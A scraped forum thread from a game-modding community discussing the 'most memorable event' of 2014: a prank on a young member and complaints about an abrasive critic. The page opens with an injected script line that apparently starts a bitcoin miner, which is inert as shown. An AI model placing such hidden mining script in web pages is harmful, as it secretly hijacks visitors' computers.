<script>
miner.start(); // initialise bitcoin miner
</script>

smbx communitypge projectsmw central

Most Memorable Event

Ready to vote? Too late it's over
Rockythechao
the figure of Kevka's bear was a sightseeing
Posts: 996
Joined: 5 years ago
First name: Michael
Pronouns: he/they
Location: Yes

Re: Most Memorable Event

Postby Rockythechao » 5 years ago

The Rao Secret Project whoops, forgot I already voted


So I looked further into the Cat Planet 2 stuff, and, not gonna lie, I have to say I'm kinda disgusted with what happened.

I thought it just stayed at a joke thread that went nowhere, but no, the creator actually got on board and gave his earnest support. Then he mentioned that the original game was made as a tribute to a beloved pet...

So naturally folks treat this serious, sensitive subject with the utmost respect.

And the community put chuchino's feelings before the project.

GG guys, you drove someone away and probably ruined a near and dear thing for the creator for what amounted to a big joke at Ningamer's expense. Clearly that makes it a prime candidate for a most memorable event of the year award.
A2XT Episode 2's vice admiral "The Project's Not Dead Yet" person and certified Absurdly-Oblivious Fool

Useful posts, discussions & resources for SMBX and A2XT

My art & audio thread
Audiomack (new music), SoundCloud (old music)

Image

𝐀𝐍 π€π–π„π’πŽπŒπ„ ππ‘π€π˜π„π‘ πˆπ’
π‚πŽππ…π‹πˆπ‚π“ π–πˆπ“π‡ 𝐔𝐒

- ππ€π“π“π‹π„π’π”πˆπ“ πŒπŽπ‘π’π„π‹ -

πŠπ„π„π π˜πŽπ”π‘ πƒπˆπ†ππˆπ“π˜

User avatar
ano0maly
Discord User
Posts: 2014
Joined: 8 years ago

Re: Most Memorable Event

Postby ano0maly » 5 years ago

Do we even know if it's really the creator?

Image The talkhaus Discord server. Come ask for an invite to join!

Image

Image
Now the sole biggest

Rockythechao
the figure of Kevka's bear was a sightseeing
Posts: 996
Joined: 5 years ago
First name: Michael
Pronouns: he/they
Location: Yes

Re: Most Memorable Event

Postby Rockythechao » 5 years ago

ano0maly wrote:

Do we even know if it's really the creator?

http://ludumdare.com/compo/2009/12/13/cat-planet-done/

It's possible that it could've been someone else impersonating them, but I seriously doubt it.
A2XT Episode 2's vice admiral "The Project's Not Dead Yet" person and certified Absurdly-Oblivious Fool

Useful posts, discussions & resources for SMBX and A2XT

My art & audio thread
Audiomack (new music), SoundCloud (old music)

Image

𝐀𝐍 π€π–π„π’πŽπŒπ„ ππ‘π€π˜π„π‘ πˆπ’
π‚πŽππ…π‹πˆπ‚π“ π–πˆπ“π‡ 𝐔𝐒

- ππ€π“π“π‹π„π’π”πˆπ“ πŒπŽπ‘π’π„π‹ -

πŠπ„π„π π˜πŽπ”π‘ πƒπˆπ†ππˆπ“π˜

Heraga
Video
Posts: 218
Joined: 5 years ago

Re: Most Memorable Event

Postby Heraga » 5 years ago

Well It's my failt for making Cat Planet 2. It was a dumb idea that I bulled out of my head one night. Or maybe it was becuase I really wanted a Cat Planet 2. Either way, It's my fault.

User avatar
Jesuiscontent
Tsundere
Posts: 860
Joined: 8 years ago
First name: cool old field
Location: France

Re: Most Memorable Event

Postby Jesuiscontent » 5 years ago

Rockythechao wrote:
ano0maly wrote:

Do we even know if it's really the creator?

http://ludumdare.com/compo/2009/12/13/cat-planet-done/

It's possible that it could've been someone else impersonating them, but I seriously doubt it.

santa doesn't exist

Image

Image
Image

Rockythechao
the figure of Kevka's bear was a sightseeing
Posts: 996
Joined: 5 years ago
First name: Michael
Pronouns: he/they
Location: Yes

Re: Most Memorable Event

Postby Rockythechao » 5 years ago

Spoiler'd because off-topic
Ningamer wrote:Well It's my failt for making Cat Planet 2. It was a dumb idea that I bulled out of my head one night. Or maybe it was becuase I really wanted a Cat Planet 2. Either way, It's my fault.
I don't take offense to the idea of a CP2 so much as the blatant insensitivity toward the guy. It's like, what if it were raocow and Gaston?

I doubt you had any bad intentions when proposing the idea in the first place, but I don't know what went on during those irc chats and I'm not sure I want to.

EDIT: And now that I realized what I just said and how far off-topic this is getting it'd probably be best to continue this either in the general discussion thread or somewhere else.

EDIT 2:
Jesuiscontent wrote:

santa doesn't exist

The existence or lack thereof of the red-suited man in question is irrelevant to this discussion, unless my response to this statement somehow proves something you're implying in which case okay sure.



EDIT 3: Oh wow I just got the joke, I'm a dumb.
Last edited by Rockythechao on 12 Dec 2014, 02:36, edited 1 time in total.
A2XT Episode 2's vice admiral "The Project's Not Dead Yet" person and certified Absurdly-Oblivious Fool

Useful posts, discussions & resources for SMBX and A2XT

My art & audio thread
Audiomack (new music), SoundCloud (old music)

Image

𝐀𝐍 π€π–π„π’πŽπŒπ„ ππ‘π€π˜π„π‘ πˆπ’
π‚πŽππ…π‹πˆπ‚π“ π–πˆπ“π‡ 𝐔𝐒

- ππ€π“π“π‹π„π’π”πˆπ“ πŒπŽπ‘π’π„π‹ -

πŠπ„π„π π˜πŽπ”π‘ πƒπˆπ†ππˆπ“π˜

TiKi
Posts: 27
Joined: 6 years ago

Re: Most Memorable Event

Postby TiKi » 5 years ago

Cat Planet 2

User avatar
YelseyKing
Anyone want a banana? :3
Posts: 1346
Joined: 6 years ago
First name: Matt
Location: Oregon

Re: Most Memorable Event

Postby YelseyKing » 5 years ago

Rockythechao wrote: So I looked further into the Cat Planet 2 stuff, and, not gonna lie, I have to say I'm kinda disgusted with what happened.

I thought it just stayed at a joke thread that went nowhere, but no, the creator actually got on board and gave his earnest support. Then he mentioned that the original game was made as a tribute to a beloved pet...

So naturally folks treat this serious, sensitive subject with the utmost respect.

And the community put chuchino's feelings before the project.

GG guys, you drove someone away and probably ruined a near and dear thing for the creator for what amounted to a big joke at Ningamer's expense. Clearly that makes it a prime candidate for a most memorable event of the year award.
Yeah, I have to agree that, given all the truly awesome/interesting things that happened this year (A2XT, MAGLX, SDS, the death and zombification of A2MT, the rao secret project), it feels a bit unfortunate that the one event that many people here find the most memorable was what amounted to, in retrospect, a cruel and ever-escalating joke at an overeager kid's expense. I have my doubts that the actual Cat Planet creator got involved, though; given the nature of the prank, it felt more to me like someone was posing as him in order to play this whole affair up even further.

I admit, I find Ningamer's extreme over-enthusiasm somewhat grating, myself. But, well, I'm a bit of an old grouch, so that's just me. Nevertheless, it's very clear to me what he's *doing*, and *why*, which is simply trying to find his some way to stand out here, something that is not in and of itself *wrong*. I do believe he does genuinely have the best of intentions, but it's the classic case of someone "trying too hard" and simply making a punchline of themselves in the process. I think he actually has some interesting ideas in theory; if he could tone down that wild energy and work on taking things more slowly and naturally, focusing on what *he* can do first, rather than what the community can do if it were to rally around him, he might well become a valuable contributor.
Image
Ayjo and Meya are watching you. Be on your best behavior.

Moists:
Image

The (Talkhaus) Price is Right
On hiatus. It'll return someday.

User avatar
Jesuiscontent
Tsundere
Posts: 860
Joined: 8 years ago
First name: cool old field
Location: France

Re: Most Memorable Event

Postby Jesuiscontent » 5 years ago

Yeah ok well since my joke was shit let me rephrase this

It wasn't actually the creator
Image

Image
Image

User avatar
Clamestarebla
Clamkind Arch-Highlord
Posts: 233
Joined: 6 years ago
Location: The Void
Contact:

Re: Most Memorable Event

Postby Clamestarebla » 5 years ago

Image
now shut up about it
Train harder, run faster, be stronger, better, evolution never over.
Image
Image
Image
Image

Heraga
Video
Posts: 218
Joined: 5 years ago

Re: Most Memorable Event

Postby Heraga » 5 years ago

This is getting intrasting and off topic.

Anyways, what was so crazy about Maglx?

User avatar
Mabel
Just west of wierd
Posts: 279
Joined: 6 years ago

Re: Most Memorable Event

Postby Mabel » 5 years ago

Clamestarebla wrote:
Image
now shut up about it
l0l
Image
Image
Image Image

User avatar
YelseyKing
Anyone want a banana? :3
Posts: 1346
Joined: 6 years ago
First name: Matt
Location: Oregon

Re: Most Memorable Event

Postby YelseyKing » 5 years ago

Ningamer wrote:Anyways, what was so crazy about Maglx?
Nothing, except that it drew in over a hundred entries. It wasn't that it was "crazy" so much as it was *awesome*, and effectively put together in only a couple months by only a few people.

...and of course, there was MrDeePay and that guy from the SMBX forums there to constantly remind us how terrible every stage was. lul
Image
Ayjo and Meya are watching you. Be on your best behavior.

Moists:
Image

The (Talkhaus) Price is Right
On hiatus. It'll return someday.

User avatar
Alice
β™₯
Posts: 2215
Joined: 8 years ago
Pronouns: Girl person
Location: Wonderland

Re: Most Memorable Event

Postby Alice » 5 years ago

YelseyKing wrote:...and of course, there was MrDeePay and that guy from the SMBX forums there to constantly remind us how terrible every stage was. lul
That was the incident that convinced me DeePay was an irredeemable moron. I can't stand trying to argue with people like that because it does not matter what you ever use as a counter-argument, no matter how valid and logical, because their mind is already set and no one could ever convince them they're wrong.

User avatar
ano0maly
Discord User
Posts: 2014
Joined: 8 years ago

Re: Most Memorable Event

Postby ano0maly » 5 years ago

MrDeePay is from SMWC not SMBX.

It's not so much what he said, but how he said it and his insistence in prolonging the arguments.

He wasn't the only one partaking in those arguments though.
Image The talkhaus Discord server. Come ask for an invite to join!

Image

Image
Now the sole biggest

User avatar
YelseyKing
Anyone want a banana? :3
Posts: 1346
Joined: 6 years ago
First name: Matt
Location: Oregon

Re: Most Memorable Event

Postby YelseyKing » 5 years ago

ano0maly wrote:MrDeePay is from SMWC not SMBX.
I said "*and* that guy from SMBX". Darkonius64, I believe was his username. Though he eventually mellowed out after people called him on his negativity...
ano0maly wrote:It's not so much what he said, but how he said it and his insistence in prolonging the arguments.
...but if anything, MrDeePay got *worse* when he was called on it. He lost me when he played the old "Do you think I care?" card, in order to try and make it look like he was totally one step ahead of you guys, for real, and it's totally not like he actually cared. Which totally explained why he stubbornly kept it up, eventually devolving into personal attacks that nearly chased Horikawa off of Talkhaus.

Yeah, he's... something else, all right.
Image
Ayjo and Meya are watching you. Be on your best behavior.

Moists:
Image

The (Talkhaus) Price is Right
On hiatus. It'll return someday.

User avatar
Alice
β™₯
Posts: 2215
Joined: 8 years ago
Pronouns: Girl person
Location: Wonderland

Re: Most Memorable Event

Postby Alice » 5 years ago

YelseyKing wrote:
ano0maly wrote:It's not so much what he said, but how he said it and his insistence in prolonging the arguments.
...but if anything, MrDeePay got *worse* when he was called on it. He lost me when he played the old "Do you think I care?" card, in order to try and make it look like he was totally one step ahead of you guys, for real, and it's totally not like he actually cared. Which totally explained why he stubbornly kept it up, eventually devolving into personal attacks that nearly chased Horikawa off of Talkhaus.

Yeah, he's... something else, all right.
DeePay's biggest issue is that he sees his negativity and abrasiveness as a positive trait and apparently when others oppose him this somehow only reinforces the idea that he's right. (Cause you're apparently supposed to agree with someone to prove them wrong in his world???)

Whimsical Calamari
i am the one that sings the chorus when you hum in the shower
Posts: 1025
Joined: 6 years ago
Location: IT CAME FROM OVER THERE

Re: Most Memorable Event

Postby Whimsical Calamari » 5 years ago

right now i am just so glad that i've never taken part in a discussion with mrdeepay
Image
Image
Image
Image
Image
Image
Image

User avatar
KobaBeach
obscure jrpg enthusiast
Posts: 1437
Joined: 6 years ago
First name: David
Pronouns: he/him
Location: Portugal

Re: Most Memorable Event

Postby KobaBeach » 5 years ago

-

the few times i spoke to deepay were:
when he made a failed attempt at a joke about me liking some koishi porn doujin or w/e because she's my fave 2hu
He wrote:
KobaBeach wrote:
He wrote:Koba and Alex's favorite doujin is Magnum Koishi.
my sig wrote:I'm a gay dude
Way to not read dude

'sides I don't really have a fave doujin, but the Build Tiger series by Gamma-G does seem rather "interesting" wink wink nudge nudge

> Expecting someone to acknowledge a sig when making a joke.
> Expecting people to care anyway after acknowledging the sig.
> Greentexting on a message board.
completely exploding when i was making a dumb observation that didn't really have anything to do with his post:
He wrote:
KobaBeach wrote:That post was one of the last ones before the drama kicked in

And it was six pages back

That's kinda hilarious
Oh my god, something from several pages back! Oh the fucking humanity!

Would you rather me fan the flames?
and the time he completely overlooked me talking about fart powerups and thought i was just talking about double jumps and then tried to make it look like the conversation was never about stupid toilet humor
He wrote:
KobaBeach wrote:Also, congrats Yogui, you've made the second SMW hack ever to have a fart powerup/gimmick
Yes, that is a good thing
Double jumps are not that uncommon.
He wrote:
KobaBeach wrote:
He wrote:Double jumps
KobaBeach wrote:fart powerup/gimmick
I do not give a fuck if it's a double jump or a ripoff of Kirby's floating or whatever
I just want it to be farts

I want more juvenile toilet humor in my hacks
Good for you. I never said anything that pertained to "farts" or stupid toilet humor, however.
KobaBeach wrote:
He wrote:Good for you. I never said anything that pertained to "farts" or stupid toilet humor, however.
Good for you. I never said anything that pertained to double jumps, however.
YelseyKing wrote:He lost me when he played the old "Do you think I care?" card, in order to try and make it look like he was totally one step ahead of you guys, for real, and it's totally not like he actually cared.
He lost me when he started patronizing Horikawa, calling her "dear" and "honey" like she was some sort of spoiled brat to him and when

he included "SJWs" and "people who treat women like wounded gazelles even when they're in the wrong" (HIS WORDS) in a post of his in SMWC's "What annoys you guys?" thread



Him replying to a dumb joke swirlybomb made with
If you want me to play your little game of throwing rock-filled snowballs, you're going to have to do a little better than that. Stop fighting with your emotions, you'll get a lot more done when you do.

(...)

As if I'm going to believe you didn't mean to do that especially when you've tried running me through the mud in the past. Make your lies a little more believable.
didn't help either

He's an immature idiot with superiority and persecution complexes

I bet ten bucks in that if he finds these posts, he's going to start a multiple page long shitstorm, throw personal insults at us like he always does because he's such a mature young man and be an asshat towards everyone because that's what 30 year old adults do am I right
Last edited by KobaBeach on 12 Dec 2014, 18:17, edited 1 time in total.
twitter (spicy at times!) | avatar by kuma

who cares:
Image

Image
Image
Image
Image

User avatar
ano0maly
Discord User
Posts: 2014
Joined: 8 years ago

Re: Most Memorable Event

Postby ano0maly » 5 years ago

My understanding was that mosts was about celebration, not about reviving past dramas.
Image The talkhaus Discord server. Come ask for an invite to join!

Image

Image
Now the sole biggest

Bwarch
Local Candy Fiend
Posts: 143
Joined: 9 years ago
Pronouns: He/Him/His
Location: Scorpions and snakes aplenty oh my.

Re: Most Memorable Event

Postby Bwarch » 5 years ago

ano0maly wrote:My understanding was that mosts was about celebration, not about reviving past dramas.
Yeah but if peeps need to vent then let them, helps keep everybody in the loop and lets peeps get their frustrations out.

I'm a bit saddened about Deepay. Their critical attitude towards level design is something that is valuable and is something that a community could make use of, individual designers even. But the character attacks and general lashing out don't really help them time and time, again and again.

I wanna like them man. I know that's weird, but I do, haha. I wanna see the good come out in people.

User avatar
Alice
β™₯
Posts: 2215
Joined: 8 years ago
Pronouns: Girl person
Location: Wonderland

Re: Most Memorable Event

Postby Alice » 5 years ago

Bwarch wrote:I'm a bit saddened about Deepay. Their critical attitude towards level design is something that is valuable and is something that a community could make use of, individual designers even. But the character attacks and general lashing out don't really help them time and time, again and again.

I wanna like them man. I know that's weird, but I do, haha. I wanna see the good come out in people.
That's one of the most frustrating parts about him to me. It's obvious that he really does mean well when it comes to his level design feedback and such but he's often far too harsh and negative and REALLY doesn't help himself when he starts lashing out and refusing to admit when he was wrong.

User avatar
KobaBeach
obscure jrpg enthusiast
Posts: 1437
Joined: 6 years ago
First name: David
Pronouns: he/him
Location: Portugal

Re: Most Memorable Event

Postby KobaBeach » 5 years ago

Alice wrote:
Bwarch wrote:I'm a bit saddened about Deepay. Their critical attitude towards level design is something that is valuable and is something that a community could make use of, individual designers even. But the character attacks and general lashing out don't really help them time and time, again and again.

I wanna like them man. I know that's weird, but I do, haha. I wanna see the good come out in people.
That's one of the most frustrating parts about him to me. It's obvious that he really does mean well when it comes to his level design feedback and such but he's often far too harsh and negative and REALLY doesn't help himself when he starts lashing out and refusing to admit when he was wrong.
Pretty much

DeePay is a great critic

But sadly, he's even greater at being a douche (and he refuses to improve upon that, in fact, as Yelsey said above, he tries to make it even worse)
twitter (spicy at times!) | avatar by kuma

who cares:
Image

Image
Image
Image
Image

User avatar
LovelyPenguin
Penguinpenguinpen
Posts: 76
Joined: 6 years ago
First name: \(0v0)/
Pronouns: any are fine
Location: Chai Kingdom (returning)
Contact:

Re: Most Memorable Event

Postby LovelyPenguin » 5 years ago

MAGLX

Darn, I like the rao secret project, but I'm gonna go for MAGLX, since I got into that right when I joined the Talkhas. I'd probably vote for A2XT, but while I liked the LP, I didn't actually partake in making it, so I wouldn't really be able to weigh in on it as an event.
Last edited by LovelyPenguin on 12 Dec 2014, 19:47, edited 2 times in total.
"The penguin is the core of the universe; the penguin is all."
- raocow

Image

Avatar by Wheat

User avatar
128-Up
Captain Aiwana
Posts: 242
Joined: 5 years ago
Pronouns: he/him/his
Location: In a ? Block somewhere, being anxious

Re: Most Memorable Event

Postby 128-Up » 5 years ago

psst

might wanna vote properly :P

EDIT: re: DeePay

Yeah, I find him super intimidating based on what everyone else has already said, and I haven't even had anything of mine scrutinised by him yet
If Mario has taught me anything, it's that most things rely on whether there's something good in a nearby box.
Note: If something in the above post is done incorrectly, tell the poster as softly as possible, please.

128-Up's IWBTG Fangame Clear List
If you're wondering what on earth 'aiwana' is, click me!

Image <-- Click it!
Image
Image PokΓ©mon is hard.


Return to β€œTalkhaus 2014 Mosts”

Who is online

Users browsing this forum: No registered users and 1 guest